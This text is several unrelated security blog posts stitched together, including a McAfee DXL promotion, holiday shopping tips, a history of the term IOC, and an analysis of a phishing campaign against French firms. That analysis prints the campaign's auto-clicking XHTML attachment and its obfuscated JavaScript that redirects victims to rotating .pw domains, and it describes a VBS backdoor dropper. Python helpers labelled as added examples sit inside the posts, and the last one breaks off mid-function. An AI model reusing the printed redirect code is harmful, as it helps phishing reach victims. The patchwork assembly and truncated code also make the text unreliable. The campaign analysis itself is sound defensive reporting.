Using a robust cybersecurity sharing framework takes the technical heavy lifting out of integrations, allowing you to focus on what’s important. Cybersharing begins with understanding the problem you are trying to solve (such as blocking a non-compliant endpoint from your network), knowing what products are involved (endpoint solution or a Network Access Control solution), understanding what you want to have happen (if an endpoint is incorrectly configured, be sure to restrict its network access), and mapping these to framework capabilities (ask the endpoint a question on its configuration status, transmit this status to the Network Access Control solution, and depending on the status, allow or block). It’s really that simple, automated, and effective.

(on the side) Integrating security tools can improve your response time by 20% (MSI Research, 2018).

Highs and lows of cybersharing

Cybersharing is not a new concept. The industry has been working on it for a while with many stakeholders. Many initiatives have come and gone in the past—the industry has always clamored for it, but it has often fallen into the “too hard” or “too expensive” bracket. Until now. There is now a belief among security vendors that we cannot do everything with just one vendor. Sharing is essential to defending our environments and defeating our adversaries.

A cybersharing option to consider

Sharing can be difficult and time-consuming. Just getting the connection to share the information may require writing to a proprietary API, which means lots of maintenance and manual efforts to add new connections. And once you have the connection, the information flow is daunting. Imagine a world where you simply share within your environment without the need to write to proprietary APIs or write with prescribed data structures.

Enter Data Exchange Layer (DXL). DXL is an established and proven communication layer, allowing security functions and tools to share and collaborate information based on a messaging topic. It’s like real-time tweets, only in this context the “tweet” would be a piece of security information and the “followers” would be your security products.

Over 4,000 organizations are participating in OpenDXL, the open source initiative using DXL to interconnect security functions to coordinate defenses. This interconnection can be a one-to-many-systems ratio or a one-to-one. It may be a simple exchange of specific threat intelligence or threat insight with a recommended response. We feel open sourcing this framework is key to information sharing—no ties to a vendor, no lock-in, and no restrictions on who or what products can integrate with DXL.

Everything you need to get started is on OpenDXL.com—from the components, to pre-built development environments in Docker containers, to documentation and pre-built integrations (including in many cases the source code). Get started and elevate your security program today.

Taking cybersharing to new heights

It’s time to join the DXL challenge—the first cybersharing contest of its kind. We’re introducing a recognition program, DXL Super Stars, to share these critical DXL integrations that improve security efficiency and efficacy. Join the cybersharers and win cash! Don’t delay—submissions must be in by late January.

 

The post Are You Sharing in this Cyberwarfare? appeared first on McAfee Blogs.

Phishing Campaign targeting French Industry

We have recently observed an ongoing phishing campaign targeting the French industry. Among these targets are organizations involved in chemical manufacturing, aviation, automotive, banking, industry software providers, and IT service providers. Beginning October 2018, we have seen multiple phishing emails which follow a similar pattern, similar indicators, and obfuscation with quick evolution over the course of the campaign. This post will give a quick look into how the campaign has evolved, what it is about, and how you can detect it.

Phishing emails

The phishing emails usually refer to some document that could either be an attachment or could supposedly be obtained by visiting the link provided. The use of the French language here appears to be native and very convincing.

The subject of the email follows the prefix of the attachment name. The attachments could be an HTML or a PDF file usually named as “document”, “preuves”, or “fact”, which can be followed by an underscore and 6 numbers. Here are some of the attachment names we have observed:

  • fact_395788.xht
  • document_773280.xhtml
  • 474362.xhtml
  • 815929.htm
  • document_824250.html
  • 975677.pdf
  • 743558.pdf

Here’s an example content of an XHTML attachment from 15th of November:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
<meta content="UTF-8" />
</head>
<body onload='document.getElementById("_y").click();'>
<h1>
<a id="_y" href="https://t[.]co/8hMB9xwq9f?540820">Lien de votre document</a>
</h1>
</body>
</html>

 

Evolution of the campaign

The first observed phishing emails in the beginning of October contained an unobfuscated payload address. For example:

  • hxxp://piecejointe[.]pro/facture/redirect[.]php
  • hxxp://mail-server-zpqn8wcphgj[.]pw?client=XXXXXX

These links were inside HTML/XHTML/HTM attachments or simply as links in the email body. The attachment names used were mostly document_[randomized number].xhtml.

Towards the end of October these payload addresses were further obfuscated by putting them behind redirects. The campaign's author developed a simple JavaScript snippet to obfuscate a list of .pw domains.

var _0xa4d9=["\x75\x71\x76\x6B\x38\x66\x74\x75\x77\x35\x69\x74\x38\x64\x73\x67\x6C\x63\x7A\x2E\x70\x77",
"\x7A\x71\x63\x7A\x66\x6E\x32\x6E\x6E\x6D\x75\x65\x73\x68\x38\x68\x74\x79\x67\x2E\x70\x77",
"\x66\x38\x79\x33\x70\x35\x65\x65\x36\x64\x6C\x71\x72\x37\x39\x36\x33\x35\x7A\x2E\x70\x77",
"\x65\x72\x6B\x79\x67\x74\x79\x63\x6F\x6D\x34\x66\x33\x79\x61\x34\x77\x69\x71\x2E\x70\x77",
"\x65\x70\x72\x72\x39\x71\x79\x32\x39\x30\x65\x62\x65\x70\x6B\x73\x6D\x6B\x62\x2E\x70\x77",
"\x37\x62\x32\x64\x75\x74\x62\x37\x76\x39\x34\x31\x34\x66\x6E\x68\x70\x36\x63\x2E\x70\x77",
"\x64\x69\x6D\x76\x72\x78\x36\x30\x72\x64\x6E\x7A\x36\x63\x68\x6C\x77\x6B\x65\x2E\x70\x77",
"\x78\x6D\x76\x6E\x6C\x67\x6B\x69\x39\x61\x39\x39\x67\x35\x6B\x62\x67\x75\x65\x2E\x70\x77",
"\x62\x72\x75\x62\x32\x66\x77\x64\x39\x30\x64\x38\x6D\x76\x61\x70\x78\x6E\x6C\x2E\x70\x77",
"\x68\x38\x39\x38\x6A\x65\x32\x68\x74\x64\x64\x61\x69\x38\x33\x78\x63\x72\x37\x2E\x70\x77",
"\x6C\x32\x6C\x69\x69\x75\x38\x79\x64\x7A\x6D\x64\x66\x30\x31\x68\x69\x63\x72\x2E\x70\x77",
"\x63\x79\x6B\x36\x6F\x66\x6D\x75\x6E\x6C\x35\x34\x72\x36\x77\x6B\x30\x6B\x74\x2E\x70\x77",
"\x7A\x78\x70\x74\x76\x79\x6F\x64\x6A\x39\x35\x64\x77\x63\x67\x6B\x6C\x62\x77\x2E\x70\x77",
"\x35\x65\x74\x67\x33\x6B\x78\x6D\x69\x78\x67\x6C\x64\x73\x78\x73\x67\x70\x65\x2E\x70\x77",
"\x38\x35\x30\x6F\x6F\x65\x70\x6F\x6C\x73\x69\x71\x34\x6B\x71\x6F\x70\x6D\x65\x2E\x70\x77",
"\x6F\x6D\x63\x36\x75\x32\x6E\x31\x30\x68\x38\x6E\x61\x71\x72\x30\x61\x70\x68\x2E\x70\x77",
"\x63\x30\x7A\x65\x68\x62\x74\x38\x6E\x77\x67\x6F\x63\x35\x63\x6E\x66\x33\x30\x2E\x70\x77",
"\x68\x36\x6A\x70\x64\x6B\x6E\x7A\x76\x79\x63\x61\x36\x6A\x67\x33\x30\x78\x74\x2E\x70\x77",
"\x74\x64\x32\x6E\x62\x7A\x6A\x6D\x67\x6F\x36\x73\x6E\x65\x6E\x6A\x7A\x70\x72\x2E\x70\x77",
"\x6C\x69\x70\x71\x76\x77\x78\x63\x73\x63\x34\x75\x68\x6D\x6A\x36\x74\x6D\x76\x2E\x70\x77",
"\x31\x33\x72\x7A\x61\x75\x30\x69\x64\x39\x79\x76\x37\x71\x78\x37\x76\x6D\x78\x2E\x70\x77",
"\x6B\x64\x33\x37\x68\x62\x6F\x6A\x67\x6F\x65\x76\x6F\x63\x6C\x6F\x7A\x77\x66\x2E\x70\x77",
"\x66\x75\x67\x65\x39\x69\x6F\x63\x74\x6F\x38\x39\x63\x6B\x36\x7A\x62\x30\x76\x2E\x70\x77",
"\x70\x6D\x63\x35\x6B\x71\x6C\x78\x6C\x62\x6C\x78\x30\x65\x67\x74\x63\x37\x32\x2E\x70\x77",
"\x30\x71\x38\x31\x73\x73\x72\x74\x68\x69\x72\x63\x69\x62\x70\x6A\x62\x33\x38\x2E\x70\x77","\x72\x61\x6E\x64\x6F\x6D","\x6C\x65\x6E\x67\x74\x68","\x66\x6C\x6F\x6F\x72","\x68\x74\x74\x70\x3A\x2F\x2F","\x72\x65\x70\x6C\x61\x63\x65","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];
var arr=[_0xa4d9[0],_0xa4d9[1],_0xa4d9[2],_0xa4d9[3],_0xa4d9[4],_0xa4d9[5],_0xa4d9[6],_0xa4d9[7],_0xa4d9[8],_0xa4d9[9],_0xa4d9[10],_0xa4d9[11],_0xa4d9[12],_0xa4d9[13],_0xa4d9[14],_0xa4d9[15],_0xa4d9[16],_0xa4d9[17],_0xa4d9[18],_0xa4d9[19],_0xa4d9[20],_0xa4d9[21],_0xa4d9[22],_0xa4d9[23],_0xa4d9[24]];
var redir=arr[Math[_0xa4d9[27]](Math[_0xa4d9[25]]()* arr[_0xa4d9[26]])];
window[_0xa4d9[30]][_0xa4d9[29]](_0xa4d9[28]+ redir)

This JavaScript code, which was part of the attachment, deobfuscated an array of [random].pw domains that redirected the users to the payload domain. In this particular campaign, the payload domain changed to hxxp://email-document-joint[.]pro/redir/.
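A script of this shape can be decoded statically, without running it in a browser. The following is an added example, not code from the original article: it decodes the hex-escaped string table, substitutes the table references back into the script, and pulls out the host names. The sample input is constructed with placeholder domains, and all function names are hypothetical.

```python
import json
import re

# "var _0x....=[ "...", "..." ];" string table, as used by the script above.
TABLE_RE = re.compile(r'var\s+(_0x[0-9a-fA-F]+)\s*=\s*\[(.*?)\];', re.S)
STRING_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
HEX_ESCAPE_RE = re.compile(r'\\x([0-9a-fA-F]{2})')
HOST_RE = re.compile(r'^(?=.{4,253}$)(?:[a-z0-9-]{1,63}\.)+[a-z]{2,63}$', re.I)


def hex_escape(text):
    """Encode text as \\xNN escapes (used only to build the sample below)."""
    return "".join("\\x%02X" % ord(ch) for ch in text)


def unescape(literal):
    """Turn the \\xNN escapes of one JavaScript string literal into characters."""
    return HEX_ESCAPE_RE.sub(lambda m: chr(int(m.group(1), 16)), literal)


def decode_string_table(js):
    """Return (table_name, decoded_strings) for the first _0x... string table."""
    match = TABLE_RE.search(js)
    if match is None:
        raise ValueError("no hex-escaped string table found")
    strings = [unescape(s) for s in STRING_RE.findall(match.group(2))]
    return match.group(1), strings


def resolve_references(js, name, table):
    """Rewrite the rest of the script with table lookups replaced by their values."""
    body = TABLE_RE.sub("", js, count=1)

    def lookup(m):
        index = int(m.group(1))
        # Leave out-of-range references untouched rather than guessing.
        return json.dumps(table[index]) if index < len(table) else m.group(0)

    body = re.sub(re.escape(name) + r'\[(\d+)\]', lookup, body)
    # obj["prop"] -> obj.prop, so Math["floor"] reads as Math.floor.
    body = re.sub(r'(?<=[\w$\]])\["([A-Za-z_$][\w$]*)"\]', r'.\1', body)
    return body.strip()


def extract_hosts(table):
    """Keep only the table entries that look like host names."""
    return [s for s in table if HOST_RE.match(s)]


def defang(host):
    """Write a host name in the defanged style used in this article."""
    return host.replace(".", "[.]")


# Constructed sample in the same shape as the script above. The two domains
# are placeholders, not indicators from the campaign.
SAMPLE_STRINGS = ["aaa.example", "bbb.example", "random", "length",
                  "floor", "http://", "replace", "location"]
SAMPLE = (
    'var _0xa4d9=[' + ",".join('"%s"' % hex_escape(s) for s in SAMPLE_STRINGS) + '];\n'
    'var arr=[_0xa4d9[0],_0xa4d9[1]];\n'
    'var redir=arr[Math[_0xa4d9[4]](Math[_0xa4d9[2]]()* arr[_0xa4d9[3]])];\n'
    'window[_0xa4d9[7]][_0xa4d9[6]](_0xa4d9[5]+ redir)\n'
)

if __name__ == "__main__":
    table_name, decoded = decode_string_table(SAMPLE)
    print(resolve_references(SAMPLE, table_name, decoded))
    for host in extract_hosts(decoded):
        print(defang(host))
```

The resolved script makes the behaviour explicit: one entry of the domain array is picked at random and passed to window.location.replace.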

However, it appears that the use of JavaScript code inside attachments was not a huge success: only a few days later, the JavaScript code for domain deobfuscation and redirection was moved behind pste.eu, a Pastebin-like service for HTML code. From then on, the phishing emails contained links to pste.eu such as hxxps[://]pste[.]eu/p/yGqK[.]html.

In the next iteration during November, we observed a few different styles. Some emails contained links to subdomains of random .pw or .site domains such as:

  • hxxp://6NZX7M203U[.]p95jadah5you6bf1dpgm[.]pw
  • hxxp://J8EOPRBA7E[.]jeu0rgf5apd5337[.]site.

At this point .PDF files were also seen in the phishing emails as attachments. Those PDFs contained similar links to a random subdomain in .site or .website domains.

A few days later, on the 15th of November, the attackers continued to add redirections by putting Twitter-shortened URLs in front of the pste.eu URLs. They used a Twitter account to post 298 pste.eu URLs and then included the t.co equivalents in their phishing emails. The Twitter account appears to be some sort of advertising account with very little activity since its creation in 2012. Most of the tweets and retweets are related to Twitter advertisement campaigns, products, lotteries and the like.

 

The pste.eu links in Twitter

 

Example of the URL redirections

The latest links used in the campaign are random .icu domains leading to a 302 redirection chain. The delivery method remained XHTML/HTML attachments or links in the emails. The campaign appears to be evolving fairly quickly, and the attackers are active in generating new domains and new ways of redirection and obfuscation. At the time of writing, the payload URLs appear to lead to an advertising redirection chain with multiple different domains and URLs known for malvertising.

 

Infrastructure

The campaign has been observed using mostly compromised Wanadoo email accounts and later email accounts in their own domains such as: rault@3130392E3130322E37322E3734.lho33cefy1g.pw to send out the emails. The subdomain name is the name of the sending email server and is a hex representation of the public IP address of the server, in this case: 109.102.72.74.
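The naming scheme described above can be turned into a check on sender addresses. The following is an added example, not code from the original article: it looks for DNS labels that are the hex encoding of an ASCII IPv4 address and groups senders by the decoded server address. Apart from the address quoted in the text, the sample headers are constructed, and the function names are hypothetical.

```python
import ipaddress
import re
from email.utils import parseaddr

# A dotted-quad IPv4 address is 7 to 15 ASCII characters, so its hex form
# is 7 to 15 byte pairs.
HEX_LABEL_RE = re.compile(r'^(?:[0-9A-Fa-f]{2}){7,15}$')


def decode_hex_ip_label(label):
    """Return the IPv4 address a label encodes as hex ASCII, or None."""
    if not HEX_LABEL_RE.match(label):
        return None
    try:
        text = bytes.fromhex(label).decode("ascii")
        return str(ipaddress.IPv4Address(text))
    except ValueError:
        # Not ASCII, or ASCII that is not a valid IPv4 address.
        return None


def sender_server_ips(from_headers):
    """Map each decoded server IP to the sender addresses that embed it."""
    findings = {}
    for header in from_headers:
        _, address = parseaddr(header)
        domain = address.rpartition("@")[2]
        for label in domain.split("."):
            ip = decode_hex_ip_label(label)
            if ip is not None:
                findings.setdefault(ip, []).append(address)
    return {ip: sorted(set(senders)) for ip, senders in findings.items()}


# Sample From headers. The first address is the one quoted in the text above;
# the rest are constructed, using the 192.0.2.0/24 documentation range.
DOC_LABEL = "192.0.2.10".encode("ascii").hex()
BAD_LABEL = "999.1.1.1".encode("ascii").hex()   # hex ASCII, but not a valid IP
SAMPLE_FROM_HEADERS = [
    "rault@3130392E3130322E37322E3734.lho33cefy1g.pw",
    "Carol <carol@%s.mail.example>" % DOC_LABEL,
    "Dave <dave@%s.mail.example>" % DOC_LABEL,
    "Alice <alice@example.org>",                      # ordinary domain
    "Bob <bob@cafebabecafebabe.example.net>",         # hex, but not ASCII text
    "Eve <eve@%s.example.net>" % BAD_LABEL,
]

if __name__ == "__main__":
    for ip, senders in sorted(sender_server_ips(SAMPLE_FROM_HEADERS).items()):
        print(ip, senders)
```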

The server behind the .pw domain appears to be a Postfix email server already listed on multiple blacklists. The compromised email accounts used to send out the phishing emails always come from .fr domains.

The links in the emails go through multiple URLs in redirection chains, and most of the websites are hosted on the same servers.

Following the redirections after the payload domains (e.g. email-document-joint[.]pro or .pw payload domains) later in November, we get redirected to domains such as ffectuermoi[.]tk or eleverqualit[.]tk. These were hosted on the same servers with a lot of similar looking domains. Closer investigation of these servers revealed that they were known for hosting PUP/Adware programs and more malvertising URLs.

Continuing on to ffectuermoi[.]tk domain would eventually lead to doesok[.]top, which serves advertisements while setting cookies along the way. The servers hosting doesok[.]top are also known for hosting PUP/adware/malware.

 

Additional Find

During the investigation we came across an interesting artifact in VirusTotal, submitted from France. The file is a .zip archive that contained the following:

  • “All in One Checker” tool – a tool that can be used to verify email account/password dumps for valid accounts/combinations
  • .vbs dropper – a script that drops a backdoor onto the user’s system upon executing the checker tool
  • Directory created by the checker tool – named with the current date and time of the tool execution that contains results in these text files:
    • Error.txt – contains any errors
    • Good.txt – verified results
    • Ostatok.txt – Ostatok means “the rest” or “remainder”

Contents of the .zip file. 03.10_17:55 is the directory created by the tool containing the checker results. Both .vbs are exactly the same backdoor dropper. The rest are configuration files and the checker tool itself.

 

Contents of the directory created by the checker tool

Almost all of the email accounts inside these .txt files are from .fr domains, and one of them is actually the same address we saw used as a sender in one of the phishing emails on the 19th of October. Was this tool used by the attackers behind this campaign? It seems rather fitting.

But what caused them to ZIP up this tool along with the results and upload it to VirusTotal?

When opening the All In One Checker tool, you are greeted with a lovely message and pressing continue will attempt to install the backdoor.

We replaced the .vbs dropper with Wscript.Echo() alert

 

Hey great!

Perhaps they wanted to check the files because they accidentally infected themselves with a backdoor.

 

Indicators

This is a non-exhaustive list of indicators observed during the campaign.


The following indicators have been observed but are benign and can cause false positives.

https://pste.eu
https://t.co

IDG Contributor Network: More AI, consolidation and regionalization coming in 2019

In reflecting on 2018 from a security perspective, some of the major themes, as I’ve written previously, have been about new AI security tools, industry consolidation and the blurring of lines between physical and cyber security. GDPR, the California Consumer Privacy Act and Facebook’s seemingly never-ending scandals related to consumer privacy have also raised regulatory and public awareness of data privacy as a key issue and concern.

These discussions will continue into next year and beyond, and there are a number of other big trends that are likely to dominate the security industry in 2019. Here are seven that I believe we’ll be looking at in the new year and for some time after that:


8 Ways to Secure Your Family’s Online Holiday Shopping

It’s officially the most wonderful time of the year, no doubt about it. But each year, as our reliance on our mobile devices and our agility with them increase, so too might our impulsivity and even inattention when it comes to digital transactions.

Before getting caught up in the whirlwind of gift giving and the thrill of the perfect purchase, consider taking a small pause. Stop to consider that as giddy as you may be to find that perfect gift, hackers are just as giddy this time of year to catch shoppers unaware and snatch what they can from the deep, digital holiday coffers. In fact, according to the FBI’s Internet Crime Complaint Center, the number one cybercrime of 2017 was related to online shopping; specifically, payment for or non-delivery of goods purchased.

8 Ways to Secure Your Family’s Holiday Shopping Online

  1. Make it a family discussion. Make no assumptions when it comes to what your kids do and do not understand (and practice) when it comes to shopping safely online. Go over the points below as a family. Because kids are nearly 100% mobile, online shopping and transactions can move swiftly, and the chances of making a mistake or falling prey to a scam can increase. Caution kids to slow down and examine every website and link in the buying journey.
  2. Beware of malicious links. The most common forms of fraud and cyber attacks are phishing scams and socially-engineered malware. Check links before you click them and consider using McAfee® WebAdvisor, a free download that safeguards you from malware and phishing attempts while you surf — without impacting your browsing performance.
  3. Don’t shop on unsecured wi-fi. Most public networks don’t encrypt transmitted data, which makes all your online activity on public wi-fi vulnerable to hackers. Resist shopping on an unsecured wireless network (at a coffee shop, library, airport). Instead, do all of your online shopping from your secure home computer. If you have to conduct transactions on a public Wi-Fi connection use a virtual private network (VPN) such as McAfee® SafeConnect to maintain a secure connection in public places. To be sure your home network is safe, secure your router.
  4. Is that site legit? Before purchasing a product online, check the URL carefully. If the address bar says “HTTP” instead of “HTTPS” in its URL, do not purchase from the site. As of July 2018, unsecured sites now include a “Not Secure” warning, which is very helpful to shoppers. Also, an icon of a locked padlock will appear to the left of the URL in the address bar or the status bar down below depending on your browser. Cybercriminals can make a fake site look very close to the real thing. One added step: Google the site if anything feels wrong about it, and you may find some unlucky consumers sharing their stories.
  5. Review bills closely. Review your credit card statements in January and February, when your holiday purchases will show up. Credit cards offer better fraud protection than debit. So, if you’re shopping online during the holidays, give yourself an extra layer of protection from scams by using a credit card. Think about using the same card between family members to make checking your bill easier.
  6. Create new, strong passwords. If you are getting ready to do a lot of shopping online, it’s a great time to update your passwords. Choose a password that is unhackable rather than one that is super easy to remember.
  7. Verify charities. One of the best things about the holidays is the spirit of giving. Hackers and crooks know this and are working hard to trick innocent givers. This reality means that some seasonal charities may be well-devised scams. Before you donate, be sure to do a little research. Look at the website’s URL, its design, and its security badges. Google the charity and see if any scams have been reported.
  8. Protect your data from third parties. Sites may contain “third parties,” which are other embedded websites your browser talks to such as advertisers, website analytics engines, that can watch your browsing behavior. To protect your data when shopping and get rid of third-party access, you need to wipe your cookies (data trackers) clean using your settings, then change your browser settings (choose “block third-party cookies and site data”) to make sure the cookies can’t track your buying behavior. You can also go into your settings and direct your browser to shop in private or incognito mode.

No one is immune to holiday scams. Many scams are intricately designed and executed so that even the savviest consumer is duped. You can enjoy the shopping that comes with the holidays by keeping these few safety precautions in mind. Don’t let your emotional desire for that perfect gift override your reasoning skills. Listen to your intuition when it comes to suspicious websites, offers, emails, pop-up ads, and apps. Pause. Analyze. And make sure you are purchasing from a legitimate site.

Stay safe and WIN: Now that you’ve read about safe shopping basics, head over to our Protect What Matters site. If you successfully complete the Holiday Online Shopping Adventure quiz, you can enter your email address for the chance to win a tech prize pack with some of this season’s hottest smart gadgets. Have fun, and stay safe online this holiday season!

 


The Origin of the Term Indicators of Compromise (IOCs)

I am an historian. I practice digital security, but I earned a bachelor's of science degree in history from the United States Air Force Academy. (1)

Historians create products by analyzing artifacts, among which the most significant is the written word.

In my last post, I talked about IOCs, or indicators of compromise. Do you know the origin of the term? I thought I did, but I wanted to rely on my historian's methodology to invalidate or confirm my understanding.

I became aware of the term "indicator" as an element of indications and warning (I&W), when I attended Air Force Intelligence Officer's school in 1996-1997. I will return to this shortly, but I did not encounter the term "indicator" in a digital security context until I encountered the work of Kevin Mandia.

In August 2001, shortly after its publication, I read Incident Response: Investigating Computer Crime, by Kevin Mandia, Chris Prosise, and Matt Pepe (Osborne/McGraw-Hill). I was so impressed by this work that I managed to secure a job with their company, Foundstone, by April 2002. I joined the Foundstone incident response team, which was led by Kevin and consisted of Matt Pepe, Keith Jones, Julie Darmstadt, and me.

I Tweeted earlier today that Kevin invented the term "indicator" (in the IR context) in that 2001 edition, but a quick review of the hard copy in my library does not show its usage, at least not prominently. I believe we were using the term in the office but that it had not appeared in the 2001 book. Documentation would seem to confirm that, as Kevin was working on the second edition of the IR book (to which I contributed), and that version, published in 2003, features the term "indicator" in multiple locations.

In fact, the earliest use of the term "indicators of compromise," appearing in print in a digital security context, appears on page 280 in Incident Response & Computer Forensics, 2nd Edition.


From other uses of the term "indicators" in that IR book, you can observe that IOC wasn't a formal, independent concept at this point, in 2003. In the same excerpt above you see "indicators of attack" mentioned.

The first citation of the term "indicators" in the 2003 book shows it is meant as an investigative lead or tip:


Did I just give up my search at this point? Of course not.

If you do time-limited Google searches for "indicators of compromise," after weeding out patent filings that reference later work (from FireEye, in 2013), you might find this document, which concludes with this statement:

Indicators of compromise are from Lynn Fischer, Lynn, "Looking for the Unexpected," Security Awareness Bulletin, 3-96, 1996. Richmond, VA: DoD Security Institute.

Here the context is the compromise of a person with a security clearance.

In the same spirit, the earliest reference to "indicator" in a security-specific, detection-oriented context appears in the patent Method and system for reducing the rate of infection of a communications network by a software worm (6 Dec 2002). Stuart Staniford is the lead author; he was later chief scientist at FireEye, although he left before FireEye acquired Mandiant (and me).

While Kevin, et al were publishing the second edition of their IR book in 2003, I was writing my first book, The Tao of Network Security Monitoring. I began chapter two with a discussion of indicators, inspired by my Air Force intelligence officer training in I&W and Kevin's use of the term at Foundstone.

You can find chapter two in its entirety online. In the chapter I also used the term "indicators of compromise," in the spirit Kevin used it; but again, it was not yet a formal, independent term.

My book was published in 2004, followed by two more in rapid succession.

The term "indicators" didn't really make a splash until 2009, when Mike Cloppert published a series on threat intelligence and the cyber kill chain. The most impactful in my opinion was Security Intelligence: Attacking the Cyber Kill Chain. Mike wrote:


I remember very much enjoying these posts, but the Cyber Kill Chain was the aspect that had the biggest impact on the security community. Mike does not say "IOC" in the post. Where he does say "compromise," he's using it to describe a victimized computer.

The stage is now set for seeing indicators of compromise in a modern context. Drum roll, please!

The first documented appearance of the term indicators of compromise, or IOCs, in the modern context, appears in basically two places simultaneously, with ultimate credit going to the same organization: Mandiant.

The first Mandiant M-Trends report, published on 25 Jan 2010, provides the following description of IOCs on page 9:


The next day, 26 Jan 2010, Matt Frazier published Combat the APT by Sharing Indicators of Compromise to the Mandiant blog. Matt wrote to introduce an XML-based instantiation of IOCs, which could be read and created using free Mandiant tools.


Note how complicated Matt's IOC example is. It's not a file hash (alone), or a file name (alone), or an IP address, etc. It's a Boolean expression of many elements. You can read in the text that this original IOC definition rejects what some commonly consider "IOCs" to be. Matt wrote:

Historically, compromise data has been exchanged in CSV or PDFs laden with tables of "known bad" malware information - name, size, MD5 hash values and paragraphs of imprecise descriptions... (emphasis added)

On a related note, I looked for early citations of work on defining IOCs, and found a paper by Simson Garfinkel, well-respected forensic analyst. He gave credit to Matt Frazier and Mandiant, writing in 2011:

Frazier (2010) of MANDIANT developed Indicators of Compromise (IOCs), an XML-based language designed to express signatures of malware such as files with a particular MD5 hash value, file length, or the existence of particular registry entries. There is a free editor for manipulating the XML. MANDIANT has a tool that can use these IOCs to scan for malware and the so-called “Advanced Persistent Threat.”

Starting in 2010, the debate was initially about the format for IOCs, and how to produce and consume them. We can see in this written evidence from 2010, however, a definition of indicators of compromise and IOCs that contains all the elements that would be recognized in current usage.

tl;dr Mandiant invented the term indicators of compromise, or IOCs, in 2010, building off the term "indicator," introduced widely in a detection context by Kevin Mandia, no later than his 2003 incident response book.

(1) Yes, a BS, not a BA -- thank you USAFA for 14 mandatory STEM classes.

Risky Biz Soap Box: MITRE ATT&CK Matrix, misconfigured security controls, attack sim and more!

The Soap Box podcast series is a wholly sponsored podcast series we do here at Risky.Biz – vendors pay to participate. This Soap Box edition is brought to you by AttackIQ.

AttackIQ is a five-year-old company that makes an attack simulation platform. The idea is you agitate a network with suspicious traffic and activities, then measure what the response looks like on the other side. As you’ll hear, Stephan argues this is a better way to test your controls than trying to do it after an incident has been and gone.

Mostly people are using it to verify the effectiveness of their security controls. They already have endpoint security software, IDS, various monitoring bits and pieces, but quite often this stuff just isn’t tuned right. So, you throw some attack traffic and behaviour at your systems and see what bubbles up.

One piece of work that has been absolutely vital to AttackIQ’s success is the MITRE ATT&CK Matrix. Like AttackIQ, the ATT&CK Matrix has been around for five years.

Stephan Chenette is AttackIQ’s CTO and he joined me to talk all about how they’re trying to use the ATT&CK Matrix to drive their whole outlook, and, conversely, how they’re spending time talking to MITRE about where the whole thing is going.

Even More on Threat Hunting

In response to my post More on Threat Hunting, Rob Lee asked:

[D]o you consider detection through ID’ing/“matching” TTPs not hunting?

To answer this question, we must begin by clarifying "TTPs." Most readers know TTPs to mean tactics, techniques and procedures, defined by David Bianco in his Pyramid of Pain post as:

How the adversary goes about accomplishing their mission, from reconnaissance all the way through data exfiltration and at every step in between.

In case you've forgotten David's pyramid, it looks like this.


It's important to recognize that the pyramid consists of indicators of compromise (IOCs). David uses the term "indicator" in his original post, but his follow-up post from his time at Sqrrl makes this clear:

There are a wide variety of IoCs ranging from basic file hashes to hacking Tactics, Techniques and Procedures (TTPs). Sqrrl Security Architect, David Bianco, uses a concept called the Pyramid of Pain to categorize IoCs. 

At this point it should be clear that I consider TTPs to be one form of IOC.

In The Practice of Network Security Monitoring, I included the following workflow:

You can see in the second column that I define hunting as "IOC-free analysis." On page 193 of the book I wrote:

Analysis is the process of identifying and validating normal, suspicious, and malicious activity. IOCs expedite this process. Formally, IOCs are manifestations of observable or discernible adversary actions. Informally, IOCs are ways to codify adversary activity so that technical systems can find intruders in digital evidence...

I refer to relying on IOCs to find intruders as IOC-centric analysis, or matching. Analysts match IOCs to evidence to identify suspicious or malicious activity, and then validate their findings.

Matching is not the only way to find intruders. More advanced NSM operations also pursue IOC-free analysis, or hunting. In the mid-2000s, the US Air Force popularized the term hunter-killer in the digital world. Security experts performed friendly force projection on their networks, examining data and sometimes occupying the systems themselves in order to find advanced threats. 

Today, NSM professionals like David Bianco and Aaron Wade promote network “hunting trips,” during which a senior investigator with a novel way to detect intruders guides junior analysts through data and systems looking for signs of the adversary. 

Upon validating the technique (and responding to any enemy actions), the hunters incorporate the new detection method into a CIRT’s IOC-centric operations. (emphasis added)

Let's consider Chris Sanders' blog post titled Threat Hunting for HTTP User Agents as an example of my definition of hunting. 

I will build a "hunting profile" via excerpts (in italics) from his post:

Assumption: "Attackers frequently use HTTP to facilitate malicious network communication."

Hypothesis: If I find an unusual user agent string in HTTP traffic, I may have discovered an attacker.

Question: “Did any system on my network communicate over HTTP using a suspicious or unknown user agent?”

Method: "This question can be answered with a simple aggregation wherein the user agent field in all HTTP traffic for a set time is analyzed. I’ve done this using Sqrrl Query Language here:

SELECT COUNT(*),user_agent FROM HTTPProxy GROUP BY user_agent ORDER BY COUNT(*) ASC LIMIT 20

This query selects the user_agent field from the HTTPProxy data source and groups and counts all unique entries for that field. The results are sorted by the count, with the least frequent occurrences at the top."

Results: Chris offers advice on how to interpret the various user agent strings produced by the query.

This is the critical part: Chris did not say "look for *this user agent*." He offered the reader an assumption, a hypothesis, a question, and a method. It is up to the defender to investigate the results. This, for me, is true hunting.

If Chris had instead referred users to this list of malware user agents (for example) and said look for "Mazilla/4.0", then I consider that manual (human) matching. If I created a Snort or Suricata rule to look for that user agent, then I consider that automated (machine) matching.
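The difference between the two modes can be shown on a small data set. The following is an added example, not code from this post or from Chris Sanders' post: it runs the least-frequent user agent aggregation and a known-bad list lookup over the same constructed proxy records. The records, the ExampleBrowser and UpdaterSvc strings, and the function names are assumptions made for illustration.

```python
from collections import Counter, defaultdict

# Constructed proxy records: (source host, user agent).
BROWSER = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) ExampleBrowser/1.0"
PROXY_LOG = (
    [("10.0.0.%d" % (i % 30 + 1), BROWSER) for i in range(50)]
    + [("10.0.0.%d" % (i % 12 + 1), "Microsoft-CryptoAPI/10.0") for i in range(12)]
    + [("10.0.0.23", "Mazilla/4.0")]
    + [("10.0.0.42", "UpdaterSvc/0.1"), ("10.0.0.42", "UpdaterSvc/0.1")]
)


def least_frequent_user_agents(records, limit=20):
    """Same aggregation as the quoted query: COUNT(*) per user agent, ascending."""
    counts = Counter(ua for _, ua in records)
    ordered = sorted(counts.items(), key=lambda item: (item[1], item[0]))
    return [(count, ua) for ua, count in ordered[:limit]]


def match_known_bad(records, known_bad):
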